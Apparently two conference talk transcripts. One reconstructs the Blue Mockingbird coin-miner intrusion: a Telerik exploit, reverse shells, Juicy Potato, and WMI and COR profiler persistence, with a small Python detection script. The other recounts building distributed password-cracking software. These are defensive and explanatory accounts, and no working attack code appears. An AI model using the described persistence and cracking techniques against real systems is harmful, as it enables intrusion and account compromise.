Here is a list of a couple of examples which will be covered later during this talk, and also some of these tools can be very handy for the analyst, but these slides will be shared with you, so let's move on. And okay, now we are ready to start with the incident response and infection with coin miners. So it began with a high load on some computers. One could say nothing strange, maybe only updates were being applied, but when local IT guys verified these machines, they noticed something unusual: abnormally high CPU and memory usage by an svchost process. Moreover, the svchost process corresponded with the Problem Reports and Solutions Control Panel Support service. This could be a more serious problem indeed. Antivirus didn't find anything, but after manual submission of the DLLs, the antivirus company identified them as a coin miner or crypto-mining variant. So that's how the incident response began. We verified the findings of our client and we started analyzing a machine with the coin miner. We followed the usual procedures and examined the provided evidence. We also verified signatures of DLLs in the Windows System32 directory and we checked those files against the National Software Reference Library database. As a result, we found a couple of malicious files, for example, this unknown file wercplsupporte.dll, which tried to mimic the legitimate file name without the 'e' suffix. On the infected systems, there were a couple of DLLs masquerading as Windows system DLL files, but their hashes and also their file names were not present in any databases of known software, and they were not found in clean Windows systems either. In addition, we saw that the extracted strings contained many occurrences of XMRig strings, so we had to deal with an infection by an XMRig-based coin miner. There is another thing common to all of these XMRig-based coin miner DLLs. They created a mutex called sample Xn07, and this mutex ensures that only one instance of the coin miner is running on each infected device. I need to add that this mutex name can be used as an additional indicator of compromise, and it can also be used for finding other related samples in public databases. While most of the detected fake DLLs had the same hash, there was only one with a different hash. It executed the command line with the command for creation of a scheduled task called Windows Problems Collection, as well as other persistence via services. Thus, it was responsible for one part of the persistence mechanism we already found. But the question is what else the attackers deployed in the client network and how they got access to the network. The first steps of forensic analysis revealed one batch file called x.bat and a couple of suspicious tasks. The batch file contained a PowerShell downloader which downloaded additional content from a JavaScript resource on the local web server. However, it was not JavaScript but PowerShell, which created the scheduled tasks, and these scheduled tasks used a file called screech temp. In our case, it contained a backdoor, a netcat backdoor. And what about its origin? The threat intelligence search based on file names and strings led us to a four-year-old scheduled task backdoor GitHub repository with Chinese comments in the readme file. Forensic analysis also revealed DLL files dropped by the IIS worker process. The DLL files were mixed-mode assemblies, so they contained both managed and unmanaged code. The .NET part of the DLL contained only an empty class. Yes, it was really empty.
On the other hand, in the native code, this DLL spawned a reverse shell connected to the attacker. And as I mentioned, there were more similar DLL files. However, these files differed only in two strings which contained the original file name of the DLL. So there were no significant differences in the functionality of these files. With the suspicion that this could be a payload delivered after the exploitation of an ASP.NET vulnerability, because of the IIS worker process, we tried to find out something more about it. With the similarity in the original DLL names, it was easy to leverage threat intelligence and find the particular vulnerability and the tool which produced the same DLLs. It turns out that these files had been part of a remote code execution exploit for a vulnerability in the Telerik Web UI for ASP.NET. This exploit can be found on GitHub, again. And after a review, it was clear that this tool was used for building the DLLs with the reverse shell we just discovered. So we found the origin of this tool and also the initial vector of compromise. Further investigation and hunting for other persistence methods revealed the WMI event subscriptions. The attackers registered the event filter and consumer and also the filter-to-consumer binding. And as a result, it executed the same command as we already saw in the DLL files. Now we thought that we were ready to start with remediation and removal of the malicious artifacts from the network. We developed custom PowerShell scripts for detection of all the malicious stuff we were aware of, including the malicious files and also the persistence artifacts. Then we deployed our script through the EDR solution and there was a big surprise. The EDR fired an alert that there were detected attempts to install persistence for malicious DLLs we already knew. So we investigated those alerts and we found that those commands had been spawned by a PowerShell process. Actually, the PowerShell process associated with our removal script. What? What the hell is this? We were absolutely sure that our PowerShell script didn't do anything like this. Its purpose was to remove malicious persistence, not to create new persistence. Yet we tested our script in our lab and our client also tested this script in their environment, and nothing similar was observed. Hence there was only one possible explanation of this: the attacker established another persistence method we had not found yet. Therefore, another investigation was needed. After a while we found that the malicious DLL was loaded into the PowerShell process shortly after it queried the registry for a specific class ID. And this class ID pointed to one of the malicious DLL files. Okay, but now there is another question. Why was PowerShell interested in this malicious class ID? The answer was in the environment variables. Specifically, there were two environment variables called COR_ENABLE_PROFILING and COR_PROFILER. They caused every managed process to be connected to the profiler specified by the given class ID. So, the attacker misused the profiling of .NET applications. Great. Another small victory for defenders. Yeah. Now, before we continue, let's quickly summarize what we discovered until now. We already saw thousands of malware samples from several families: coin miners, DLL installers for those coin miners, scheduled task backdoors, and reverse shells delivered after the exploitation. Regarding persistence, we already discovered malicious services and scheduled tasks.
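To make that COR profiler trick a bit more concrete, here is a minimal detection sketch in Python. It was not part of the actual investigation; it only checks the standard machine and user Environment registry keys for the two profiler variables and resolves the referenced class ID to a DLL path, so treat it as an illustration rather than a complete hunt.

```python
# Minimal sketch: look for .NET COR profiler persistence on a Windows host.
# Checks the machine-wide and per-user Environment keys for the two profiler
# variables, then resolves the CLSID to the DLL registered under
# InprocServer32. Illustrative only: per-service environment blocks and the
# WOW6432Node hive are not covered here.
import winreg

ENV_KEYS = [
    (winreg.HKEY_LOCAL_MACHINE,
     r"SYSTEM\CurrentControlSet\Control\Session Manager\Environment"),
    (winreg.HKEY_CURRENT_USER, r"Environment"),
]

def read_value(root, path, name):
    try:
        with winreg.OpenKey(root, path) as key:
            value, _ = winreg.QueryValueEx(key, name)
            return value
    except OSError:
        return None

def resolve_clsid(clsid):
    # A registered profiler CLSID maps to a DLL via its InprocServer32 key.
    path = rf"SOFTWARE\Classes\CLSID\{clsid}\InprocServer32"
    return read_value(winreg.HKEY_LOCAL_MACHINE, path, "")

for root, path in ENV_KEYS:
    enabled = read_value(root, path, "COR_ENABLE_PROFILING")
    profiler = read_value(root, path, "COR_PROFILER")
    if enabled == "1" and profiler:
        print(f"[!] Profiler persistence candidate under {path}")
        print(f"    CLSID {profiler} -> DLL {resolve_clsid(profiler)}")
```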
And later on we discovered and analyzed the WMI event subscription and COR profiler persistence. At this point, we had a lot of samples and persistence. But we were faced with the question of how the attackers could install all of these persistence artifacts and what exactly they did between the initial exploitation and the installation of coin miners on thousands of computers. Now we really needed to enrich our results with external data from threat intelligence and OSINT. We used a clever tool called Munin by Florian Roth. All we needed to do was to create one file with hashes of the malware samples and let Munin do its work. We found several hashes in public repositories, but there was only one public submission of the DLL installer, without any detections. When we did a context search instead of an object search, we got another submission, as we can see in the picture: a zip archive with potentially malicious files. Now let's look at the zip file. It contained several DLLs, batch files and one MOF file, which stands for Managed Object Format. We were familiar with some of them. One DLL was the coin miner and the second was the installer we had already analyzed. The MOF file was interesting. Now you can see its content on the right. It contained definitions of the WMI event subscriptions used for the persistence we found earlier. So we got it. We found the WMI persistence. Now we knew how it was created. But what about the batch files? They were new for us, but there was a strong assumption that they were also related to the same attacks. When we examined the rn.bat file, we could say Eureka! This batch file was an installation script for all the stuff related to the coin miners and persistence we had already discovered. Thus, this was another piece of the puzzle we had been missing until now. The first batch file, called sn.bat, was an unpacker. It also seemed that the coin miner malicious stuff originally came as a package called set.zip. We also saw that this installation batch script was executed via a program called let.exe. But what was let.exe and what files did set.zip contain? We had not found that yet. So let's continue. We applied the same approach again and we tried to do reconnaissance about let.exe and the installation package. In some cases, we were able to follow tracks of the let.exe execution in public sources. It seemed that it was a kind of local privilege escalation exploit, and then suddenly we found one submission of set.zip on Hybrid Analysis, and this submission could be related to our investigation. And yes, this file was exactly the one we were hunting for, the installation package. And the program let.exe was included. As it turned out, our hypothesis was correct: the program let.exe was the Juicy Potato local privilege escalation exploit with source code available on GitHub. Again, again on GitHub. Then only the last sample was left, which we had not analyzed until now: the nw.gold.dll from the previous zip archive from Any.Run. It was a mixed-mode DLL file. Its name was composed of a noun, a timestamp and the architecture. And the managed code contained only an empty .NET class, while the native code contained a dropper of the unpacker batch file we saw before. But wait, doesn't this nw.gold.dll file look familiar? Of course, we already saw a mixed-mode DLL with an empty C# class. It was the reverse shell payload delivered by the Telerik Web UI exploitation. So let's compare these two files side by side.
We can see that they contain a lot of similar stuff and we could assume that this DLL had also been created with the build scripts from the Telerik Web UI exploit, but this time it was developed by the threat actor. Okay, we found all the missing pieces of the puzzle. We also collected all the samples needed for attack reconstruction or simulation. And in that moment, we went one step further. We also collected the whole set of needed samples from public sources. Therefore, we could demonstrate this attack using public sources and public sandboxes without revealing any sensitive info from the private samples shared by our client. So allow me to play a short video demonstration. Dadadadadada. Okay, thank you for watching the video and now, before we summarize our findings, let's proceed with the last part of this talk, the attackers' profit. We extracted the mining pool parameters and configuration either from captured pcaps or from memory dumps. Then we used these parameters for hunting for more and more samples and repeated this process again and again. Finally, we collected several worker IDs, but only two account IDs. These account IDs were already used in several cases. In the table, there are the amounts of Monero coins mined by the attackers on various pools. As a footnote, some workers were still active last week. But back to the case. In the cases we discovered, the attackers have mined approximately 150 Monero coins in total, which is now approximately $13,000. For comparison, the average damages per victim vary between $50,000 and $500,000. And this includes only the direct costs such as the incident response and remediation process, investigation and reinstallation of their systems. The indirect costs such as reputation loss and disruption or damages due to downtime aren't included in this estimation. And last but not least, what was discovered in our analysis and research? First of all, thanks to online databases and feeds, we were able to find the missing pieces and reconstruct the whole attack performed by this threat actor. In the meantime, this threat actor got a name, Blue Mockingbird, given by the Red Canary company. We observed that they were capable of adapting and customizing various tools from GitHub and putting it all together in their unpacker and installation scripts. It is unusual to see so many persistence methods used in one attack. This probably required research performed by Blue Mockingbird. After that, they were able to earn thousands of dollars, but the victim damages are much greater than the attackers' profit. So that's all from my side. Here I have provided some resources related to this talk. And additionally, you can read something about my work or research on our company website or on my personal blog, and you can find me also on Twitter. So thank you very much for attending this talk, and if you have any questions, please feel free to ask me.
|
During March-May 2020 the Blue Mockingbird group infected thousands of computer systems, mainly in enterprise environments. There are known incidents in which they exploited the CVE-2019-18935 vulnerability in Telerik Web UI for ASP.NET, then used various backdoors, and finally deployed XMRig-based CoinMiners for mining the Monero cryptocurrency. What is interesting about these cases is the persistence used for the CoinMiners - a lot of techniques, including scheduled tasks and services, but also WMI Event Subscriptions and COR Profilers. During the forensic analysis and incident response process it was possible to find these persistence mechanisms and many CoinMiner artifacts, but the malware samples responsible for their installation and persistence creation were missing. However, when we enriched the results of standard malware analysis with Threat Intelligence data and OSINT, we were able to find the missing pieces of the puzzle and reconstruct the original attack chain, including the initial exploitation, a local privilege escalation exploit, two backdoors, the main payload and multiple persistence techniques. Moreover, this research reveals much about the tools, techniques and procedures (TTPs) of the Blue Mockingbird threat actor. Finally, with more knowledge about the attackers it is possible to collect more samples of the CoinMiners used by them. After a next step of reconnaissance we can get insight into the profit of their attacks and compare it with the damages caused by these attacks.
|
10.5446/51594 (DOI)
|
This is Jeremi Gosney. I'm coming to you live from Password Village HQ2 in sunny Austin, Texas. Today's high is 104 degrees. So today I'm going to be talking to you about what it's like cracking at TerraHash scale. I'm not going to make this a vendor pitch in any way. I'm going to focus on the technical challenges that we encounter as we support clients who have, you know, hundreds of GPUs in their clusters. You know, when I first kind of started on this, I kind of thought like 100 GPUs was a really big deal. Now we kind of tend to view 100 GPUs as like meh. I mean, it's good, but it's kind of middle of the road. So, you know, there's a lot of distributed solutions for Hashcat out there. But as far as I know, TerraHash is the only one that aims to operate at warehouse scale. And what I mean by that is more so with the most recent version, but with every version that passes, we aim to embrace the concepts of data center as a computer. And while we currently don't have any clients who have an entire warehouse full of password cracking hardware, that's the point where we're trying to go. And we try to enable the software to be at that level, even if our clients are not quite at that level. So, I'm going to go through the history of how I got started in, you know, massive distributed cracking. And I'm going to go through the technical challenges that we faced as we continue to evolve our Hashstack distributed solution. So, I'm going to start the slide deck. All right. So, in the beginning, I kind of got into this because I was messing around with distributed computing, I was doing stuff with MPI, some other MOSIX-like software, Rocks clusters, you know, things of that nature. But that was all CPU based. And then when GPU cracking came about, you know, we started looking for solutions that would enable us to distribute GPU workloads. So, I found a piece of software out of Hebrew University called Virtual CL. And I did a presentation on a 25 GPU proof of concept cluster that me and Bitweasil put together at Passwords12 in Oslo. And when I woke up the next morning after giving that presentation, we had gone viral. We were on the front page of Slashdot, Gizmodo, Boing Boing, NBC News, The Register, like we were everywhere. And in hindsight, I really should have used a lot more than 25 GPUs. I mean, we had more GPUs. That's just what we chose to dedicate to this proof of concept. And had I known in advance in any way that the general public would react how they did to this proof of concept, I would have used like three times the number of GPUs. So just, you know, some of the headlines that came out the next morning that I woke up to, which was pretty surreal because I didn't really see this as a big deal. So, Virtual CL was cool at the time because it was the first solution that I knew of that enabled us to sort of transparently distribute OpenCL jobs across an arbitrary cluster. So what Virtual CL does is it provides a virtual OpenCL platform. And the target software in theory doesn't need to be aware it's communicating with a virtual platform. It just sees Virtual CL as any other, you know, OpenCL platform, just like AMD, Nvidia, Intel, what have you. So the target software just simply links against the libOpenCL which is provided by VCL, which then communicates to a broker daemon.
And then that broker demon distributes the agent demons and the agent demons which are installed on the compute nodes actually communicate with the real open seal library be at AMD and video whatever. So in theory all this is transparent to the end application but in practice, it didn't quite work that way. We had to have a special fork of OCL hash called VCL hash cat, which had some workarounds for VCL quirks and such. It was also required in Fina band, because it was really latency sensitive and ended up being a very chatty protocol, and it required essentially real time communication bandwidth wasn't so much of an issue it pretty much consistently pulled, you know, less than one gig of bandwidth but the, it was really sensitive to latency, you know, even just a couple milliseconds was a couple of things was acceptable but you start getting up into like double digits of latency. You had a noticeable impact on hash rate. And of course if in a band hardware is expensive, it's way more expensive than Ethernet. So it's a low close source, and it required frequent updates. So this is back in the time. You know, this is 2012 through 2013, where every GPU driver that was released broke some shit. And then we had to go back in and implement workarounds and fixes wherever the fuck AMD or Nvidia broke in their driver that day. And VCO was no exception. So with VCL hash cat, we had to have our own workarounds for virtual CL. And then the VCL team, or virtual CL team had to turn around and implement any workarounds for any new driver releases every time they were released, which is, you know, a pretty substantial job. And the problem is virtual CL was created by grad school students. This was a grad school project, and they created this their senior year. And when they graduated in spring 2013, that was it. The project died. So when, you know, the next version of FGL or X was released, you know, I think that was version 13.9 in September of 2013. You know, we go to install a virtual CL cluster for a client. This is actually a 64 GPU cluster, which I mean, we're just starting out. So this is actually a pretty big deal for us. Like 64 GPUs was pretty fucking cool at the time. But, you know, we get, oh, it's installed, we get the hardware built, all that shit. And then we go to install virtual CL and FGL or X and virtual CL just shits the bed. So I like panic and email Hebrew University, you know, I'm like, you guys, we need to update virtual CL for catalyst and FGL or X 13.9. And they, like, well, we can't. Everyone who is working on this project has gone. And intellectual property remains with Hebrew University and mosics. So they can just like, you know, have those people work on it outside of that. I offered to take over the project for them. Because it was kind of essential to what we were doing and I didn't want to see the project die. I thought it was really neat. But the professor over there who was in charge of the project was not amenable to that idea. He actually had pretty grave concerns when we first started using virtual CL for password cracking because he envisioned us turning the world into like a giant botnet. And of course, that wasn't really on our agenda, at least not at that time. But, um, yeah, he really didn't like the idea of, you know, his virtual CL shit ending up in our hands. So we were left high and dry without a software solution. And so we desperately needed something. So we conceived the idea of hashtag. 
Initially, we thought about making your own virtual CL clone since Hebrew University was not going to give us the virtual CL source code and we're like, well, you know, fuck it, we'll start our own virtual CL with, you know, hookers and blackjack. But the more we actually sat down and thought about what that entails, we determined the level of the level of effort for that was just way too high. And the timeframe in which we needed it was way too short. Like we literally had, you know, hardware in house that we're building for clients who now have no software solution because of virtual CL. So we decided to make a distributed wrapper. And that's when we came up with the idea of hashtag. Like I said, we had iterate really quickly on this. So we went from a whiteboard session to production in less than two months. And this was basically me and Tom steel locking ourselves in the office and, you know, ordering like over $100 for the Taco Bell and just banging this out as fast and furious as we could. I had a traditional client server agent architecture. And it was hash cat focused, but it actually had a generic plugin interface. We had plugins for and this is before there was just one hash cat, right. So we had hash cat, OCL hash cat plus OCL hash cat light plugins and then we had John the Ripper plug in. And then we had like just a generic interface to where any cracking tool could be made to work with hashtag as long as it adhered to like a standard format that we had defined. And then it also had the ability to run arbitrary commands when idle. This was less for our clients and actually more for me because we were running hashtag in house as well for our, you know, cracking as a service type stuff. And this is back in a time when GPU mining was still profitable. So when we weren't working on a password cracking job, I wanted this thing to be generating coins in the background. So the arbitrary idle except command was literally just put in place so that people could like mine light coin or name coin or whatever, when they're when their cluster was idle. So, you know, totally different time. But I mean, it actually worked, you know, it did exactly what it's supposed to do and it was good. And the whole goddamn thing was implemented in this fancy new language called Node.js. Again, this is, you know, early 2013. So like, you know, Node.js was the new hotness and you know, everyone was starting to move that direction with microservices and everything. And that's something is not on the slide but we implemented hashtag version one entirely as microservices. And I shit you not there was like 23 individual packages that comprised hashtag and almost all of those were microservices. And we went that direction because that's kind of like, you know, the programming zeitgeist at the time right like everyone was pushing microservices and pushing asynchronous and, you know, no sequel and all that other horseshit right. And in the end, it created more headaches than not if we just had a monolithic fucking program. You know, maintaining like one server binary and one agent binary is way simpler than like, you know, maintaining 23 individual microservices and making sure that they're all seen to communicating properly and, you know, that the versions are correct, you know, across all 23 packages and there's just a lot of unnecessary headache that was introduced with that that, you know, we we attempted to manage. 
But even then like our clients would still kind of mess it up, you know, they're, you know, like they would upgrade like 10 of 20 packages and then like the other ones would just be stuck at all versions or, you know, one demon would die and another demon would know that it's dead so then it would shit the bed and anyway. So yeah, no JS microservices, no sequel MongoDB all that shit, try to use all the latest and greatest everything because at the at the time that seemed like the best idea. And also hashtag was more than just workload distribution. So a lot of our clients at the time thought that hashtag was just a g y friends in for hash cat. And we're like, no, it's not it's not just a web UI for hash cat, it actually does like, you know, multi user and, you know, workload distribution with like a really complex four dimensional queuing mechanism like you're trying to explain all this to the client and they're just like, you know, eyes glazed over and like, so it's a web UI for hash cat, like fucking yes okay it's a web UI for hash cat. But it actually did a hell of a lot more than that in fact when you installed hashtag on your box, it basically hijacked it and configured it exactly the way that we needed to be configured it would actually provision the entire server from just installing like the initial meta package. So it's a complete stack of packages they get stack hashtag that's where it comes from. So we had a driver installation driver configuration driver updates and again this is back at a time and even nowadays so kind of a challenge but this is back at a time when GPU drivers were painted in the ass to install and then once you got them installed it was painted in the ass to update. So the fact that we kind of handle this automatically was a pretty big value add also handle configuration even though these are headless servers at this is actually during a time where when you had a headless server you had to have fucking dummy plugs connected to each of the GPUs. There's probably very few people watching this who actually remember that. But yeah, if you had a completely headless server each one of those GPUs had to have a special dummy plug attached to it. So that would connect the necessary pins to trick it to think that there's actually a monitor attached. And we actually had to run Xorg because even though these are headless without Xorg we didn't have the ability to manually set fan speeds, or GPU clock rates, or set like power to do that. So, even though this is a headless server we still had to have dummy plugs to think there's a monitor attached still had to run Xorg and still had to configure Xorg properly to enable us to you know control the fans and control the clocks and all the other shit that we needed to do. And then along those lines. Hashtag also did GPU tuning for you and also automatic overclocking. And this was kind of a double edged sword. So when the R9 290X came out, at first it was like entirely unusable, because of the way that AMD aggressively implemented power tune firmware, I think it was 2.0 at the time. But the GPUs would throttle so aggressively that it was like way slower than the 7970, and it was just essentially unusable. So then I wrote OD6 config. So I think power tune is fucking overdrive. I'm sorry. Oh no, no power tune is AMD. Power miser is AMD. All right, whatever. So OD6 config enabled us to properly configure the R9 290X. And but it was still like it was good, but it was still kind of like mediocre, right? 
But at that time when I measured it, it was only drawing 300 watts, which is important, because our server platforms like the Brutalis can only handle GPUs that drop the 300 watts. You draw more than that, you're going to blow a fuse on the PCI slots on the motherboard. So we had a automatic overclock profile for the R9 290X that we pushed out to our clients that made the GPU draw just about 300 watts. And then a little bit later down the road, about a year, year and a half later, AMD pushed out a new driver update that actually caused the power consumption to go up by a good 50 to 75 watts. And we did not know this. This kind of went undetected by us until we started getting a rash of clients who were seeing dead PCI slots on their motherboards and all of them had R9 290X based solutions. And I finally busted out a kilowatt and figured out what the fuck was going on. But we actually had the ability through, you know, this, all these mechanisms that we had in hashtag at the time to enable, like the automatic overclocking and configuration and all that, to push out a new underclock profile to all of our clients to try to drop the power consumption down to keep it from blowing PCI slots on the motherboards. So it's both good and bad. Like the fact that we're able to automatically overclock GPUs, you know, to help get the most speed of the GPUs is awesome. But then like in that one specific scenario, it was bad because you start blowing PCI slot pieces. But then it was good that we had this functionality because then we could like correct it through software over the air and automatically correct it on all of our client systems at the same time, which saved us a lot of money because we were, you know, spending hundreds of thousands of dollars on new motherboards. So yeah. And then of course, hashtag also had cluster resource monitoring. So there were some drawbacks. Like I said, the entire guy that thing was written in Node.js. And while Node.js is asynchronous, it also runs on a single CPU thread that may have changed at some point was we're talking like 2013 seven years ago. And I haven't even touched Node.js since. But at the time, everything ran in a single CPU thread, which was stupid because like our cluster controllers had like a minimum of like, you know, 12 CPU cores 24 threads and we're sitting here stuck in one. thread on the server demon. So any long running methods would just totally block the entire application. And we had massive scalability issues. I think the very first, like alpha that we released to clients can only support like four nodes. The second one, we were able to get up to like, you know, nine or 10 nodes. Basically anytime a client ordered a cluster larger than the previous largest cluster we had ever built. We ran into some kind of scalability issue identified some bottlenecks and had to work to remove those bottlenecks. Unfortunately, 90% of the time, the bottleneck was the fact that JavaScript was too slow for the task that we were trying to do. So we had to reimplement, you know, those bottleneck methods in a faster language and they just shell out to them. So like key space calculation was re implemented in C now calculating key space for a mask attack is like really lightweight. But you know, we need to talk about massive dictionaries or rule files, trying to count the number of lines in a file with JavaScript is painfully slow. So that's largely why that entire portion was re implemented in C. 
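Just to make that concrete, here is a rough sketch of the two keyspace calculations he's describing; it is not the actual code, just the idea that a mask keyspace is a handful of multiplications while a wordlist keyspace means counting lines in a potentially huge file. The charset sizes are the usual hashcat-style ones.

```python
# Rough sketch of the two keyspace calculations mentioned above. A mask
# keyspace is simple arithmetic; a wordlist keyspace means counting lines in
# a potentially huge file, which is pure I/O grunt work.
CHARSET_SIZES = {"l": 26, "u": 26, "d": 10, "s": 33, "a": 95}

def mask_keyspace(mask: str) -> int:
    """Keyspace of a hashcat-style mask such as '?u?l?l?l?l?d?d'."""
    total = 1
    i = 0
    while i < len(mask):
        if mask[i] == "?":
            total *= CHARSET_SIZES[mask[i + 1]]
            i += 2
        else:
            # a literal character only ever contributes a factor of 1
            i += 1
    return total

def wordlist_keyspace(path: str) -> int:
    """Keyspace of a straight dictionary attack: one candidate per line."""
    count = 0
    with open(path, "rb") as f:
        for _ in f:
            count += 1
    return count

print(mask_keyspace("?u?l?l?l?l?d?d"))  # 26 * 26**4 * 10**2 = 1,188,137,600
```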
And we just like shelled out to that binary to eliminate that body now not eliminate but dramatically reduce it. Rejects anything Rejects. We actually implemented we had implemented in Pearl because Pearl is amazing at Rejects JavaScript is not very good at Rejects. The very thing that we're doing with Rejects here was like validating the hash lists right so client uploads a uploads a hash list and you know some of our clients wouldn't even bucket throwing like 200 million hashes at hashtag right and like one job. But then hashtag has to sit there and, you know, receive the massively large hash file and then validate each individual hash, and then, you know stuff them in a database. And then massive bottleneck. So we end up remit re implementing all that in Pearl to try to get that down and then the agent, like the entire fucking agent we have just re implemented the whole thing in Pearl. We just got so fed up with, you know, everything there and the only reason we picked Pearl at the times because that's like the only language we can iterate fast enough and to rewrite the entire damn thing. But yeah, I said we also used MongoDB, because no sequel was like, you know, the rage at the time. And out of all the no sequel databases we tested Mongo was the most performant. But you know, then we had clients do things like throw 200 million hashes at hashtag. And that would cause, you know, some not only just, you know, bottlenecks and, you know, blocking processes but some like really UI weirdness as well. Like, you know, they would go through the process of creating a job uploading the hash list, and they would just sit there with like the little spinner for a while until it timed out. And so they'd go to create the job again because it timed out right and then they'd go back like 10 minutes later and find out that the other job had finally completed and was actually active and running. But because they went through the process four times trying to get at the start now they have like for the same process running on the cluster. So we threw Redis in front of Mongo as an in memory caching layer. And that actually had a significant impact like positive impact. And they enabled us to ingest hashes a lot faster. But still not a very great solution overall. The web UI client was implemented implemented as a single page application in Angular. It was really clunky. It was really heavy. It was really slow. It constantly caused the browser to freeze if you left it up for more than like 30 minutes. And it just had a ton of bugs. And I think probably the most annoying thing is if you're like a hash cap power user and you sit down and try to use the hashtag web UI. It was just cumbersome as fuck. You know, if there's no way to move quickly in that UI and it gets very repetitive and very tedious. So there was a lot of drawbacks to having that Angular web UI. I absolutely hated it. And you know, anyone who was like really experienced with with cracking and hash cat and stuff, they also hated it and begged us not to have that again. And we were just severely limited by what we could do in a browser for non hash formats at the time. We were scraping everything server side. So like you actually upload like a PDF or upload a doc x or, you know, whatever and we would, you know, scrape the file server side to get the necessary bits. You know, like, office to hash cat and PDF to hash cat shit like that. 
The problem then became like what do we do with things like, you know, true crypt volumes, or really large sevens of volumes or raw files, right? Like, are you really going to upload like 100 gigabyte disk image through the browser and just we can scrape off like two kilobytes? Like, no, that doesn't make any sense. So yeah, the browser was an issue and then we implemented access controls, but there was nothing fine grain. We assumed that because everyone operating the hashtag cluster was on the same team that, you know, they all kind of had equal rights and equal access to the cluster and therefore all users are admins. We didn't have like, you know, different roles or anything. It was just, if you have an account, then you obviously have a right to be there. Therefore, you are an admin. And I think some of our clients end up wrong with that because it's like, yeah, like everyone on this team does do, you know, have equal rights and access and privilege to the cluster. So this is totally fine. Other clients were like, this is absolutely unacceptable. I eventually got to the point where the old version one code was completely unmanageable. And just implementing what should have been like a minor bug fist ended up like requiring major refactoring. It just wasn't because we threw it together in less than two months, you know, so we didn't think of everything in advance, you know, that would come up and it got really, really hard to implement new features and, you know, try to work around some of the, you know, some of the bugs in there. So we decided we need an entire ground up rewrite for hashtag version two. And at some point I got the idea to create a commercial fork of hash cat with native distributed capabilities. And at the time I was so fucking stoked on this idea it seemed like the best idea, like in the world to me at the time. So we set out to do just that. This is right before hash cat went open source. And then we started work on this like, literally the minute that hash cat went open source. So we implemented and go lang and see with postgres database. Now we chose going because of hiking high concurrency with with go routines right. So with no JS everything ran on a single CPU thread. And we wanted the opposite of that for version two, right, we're going to learn the lesson on that. So, you know, we wanted, you know, just lots and lots of go routines to run everything so that we use like, you know, all 24 threads plus on the box. And going actually also allows for pretty rapid development. So we thought it was a pretty good choice. But we still stuck with the traditional client server agent architecture. You know, we have, you know, numerous clients and then one server, and then however many agents, meaning that that server is both a bottleneck and a single point of value. So the first thing we had to do is we had to split hash cat in two. We took everything that had to do with like, actually starting a cracking job and you know, executing an open cl curl on a GPU was placed into the agent and nothing else like the agent was just like bare bones trimmed down hash cat, you know, launch attack on GPU and that was it nothing more. And everything else we placed into the server library. And then for any code that wasn't already in hash cat, such as like the Jason API, and the, you know, proto buffs for agent server communication workload distribution. Multi user access control and this time we actually implemented fine grained multi role access control. 
All that was implemented and go. And then we just linked against the sea libraries and this effort actually laid the foundation for the hash cat 4.0 refactor with Libhash cat. And then, because of how clunky our old web UI was, we actually ditched it entirely for a cross platform CLI, which made our power users like really happy. But our less experienced users were not very thrilled with that decision. They still wanted, you know, a GUI, which fair enough. So our plan initially was to maintain both hash cat and hashtag trees in parallel. And then, if there was any features that we added to hashtag, or any like new kernels that we wrote, we would just, you know, backport those as we chose to ask that. This didn't really work out very well in practice though. So when we released version two, it was in sync with hash cat 3.5, but it didn't stay that way for very long. And of course we had to add a cross platform GUI to the roadmap as well because we had significant feedback from our clients that they really wanted the goddamn GUI and they were not happy that we took away the web UI. It turns out this was the single dumbest motherfucking thing I've ever done in my life. I completely underestimated how much work was involved in creating a commercial fork of hash cat. Like, genuinely, I, yeah, I really don't know how to convey how fucking stupid of an idea this was. We spent like 100% of our time just backporting things from hash cat into hashtag instead of actually adding new features or running new kernels, like literally months of work, you know, just backporting hash cat commits. And I got really frustrating, you know, it's like, Hey, are we are we working on these tickets? Are we working on these features? No, we're working on backports. You know, I got so sick of hearing working on backports working on backports like, like, when are we ever going to be done with backports? And then when Adam refactored hash cat for 4.0, that also meant that we had to refactor hashtag as well. And we hadn't even finished implementing all the backports at the speed that Adam was, you know, committing things to hash cat. So this was just like, absolutely un-maintainable, right? Like, fuck me. And then there was also this other little minor problem where we picked the wrong HTTP library for the API. And this basically limited the server's capability to about 12 nodes. Now, 12 nodes might seem like a lot. That's 96 GPUs. You know, that's a pretty respectable size cluster. The problem is this particular clients had ordered 320 GPUs, 40 nodes. And you can't really deliver a 40 node client to a cluster with a server that can only really handle 12 nodes. So this required not a complete rewrite, but a damn near complete rewrite time fuck, because we use that HTTP library extensively throughout the code. And there was no, like, drop in replacement. So basically anywhere where we were dealing with HTTP, we had to rip out the old library and then, you know, add in all the stuff for the new library. But they did resolve the issue. It was just really painful at the time to have to mess with that. But the server still continued to be a single point of failure and still proved to be a source of bottlenecks. As we, you know, tried to build larger and larger clusters. We kept running into problems with the server being a bottleneck and a single point of failure. 
And we also had clients coming to us asking us if they could order multiple cluster controllers and cluster them together, you know, either high availability or like load balance them or something. And we didn't have a solution for that, but I started thinking about a solution for that. And again, like 40% of our clients were just completely pissed that we had no GUI. So it got to the point where it's like, let's just re-think like the entire fucking thing and just like go as far away from these mistakes as we could possibly get. Like we never ever want to make any of these mistakes ever again. We've learned a lot of lessons from, you know, what we've done over the last seven years. So, but we need more than just completely ground up. We need an entire paradigm shift. Like we need to rethink this entire problem entirely and come up with something that's completely different from what's ever been done. So we need to eliminate the single point of failure at the server. We need to enable like actual infinite horizontal scaling. Because again, we're, you know, we always try to strive for like warehouse as a computer. Right. We're looking at warehouse scale computing as like the target that we're trying to hit. There should never be any, you know, limiting factors outside of budget for like how many nodes we can support in hashtag, right? And then of course, the other big requirement is we have to actually move at the pace of hash cat development. We have to, you know, as Adam commits things to hash cat, we need to have those not instantly available in hashtag, but within a very reasonable timeframe. So the very first idea we came up with was let's not do a traditional client server agent model. And that's not even try to cluster the cluster controllers. Let's just eliminate the cluster controllers entirely and make everything peer to peer where all nodes are equal. And there are no dedicated servers. And the biggest requirement to this is that work can be submitted to any node. So let's say you have like, you know, 20 users and you have, you know, 10 boxes, like there shouldn't be just one node that all of them have to hit. They could should be able to hit any node in the cluster and, you know, have the same view from any node. And it also needs to be more user friendly than ever and also needs to run on Windows. I'll tell you why in a minute. So set out to like figure out how we're going to implement this because we have that we have the high level requirements, right? Like we know it needs to be peer to peer. We know all the nodes need to be equal, you know, all that shit. How are we actually going to do this? So pretty obviously we're going to need some sort of distributed state machine, right? And that that's just straightforward and self-explanatory. But, you know, like, like, we just don't message you add in some pubs up and, you know, Bob's Uncle. But what about disagreements or, you know, maybe even more than disagreements? What about like an actual, you know, rogue cluster member, you know, or, you know, a broken, you know, cluster node that's maybe not necessarily intentionally malicious, but it certainly, you know, has, you know, the appearance of 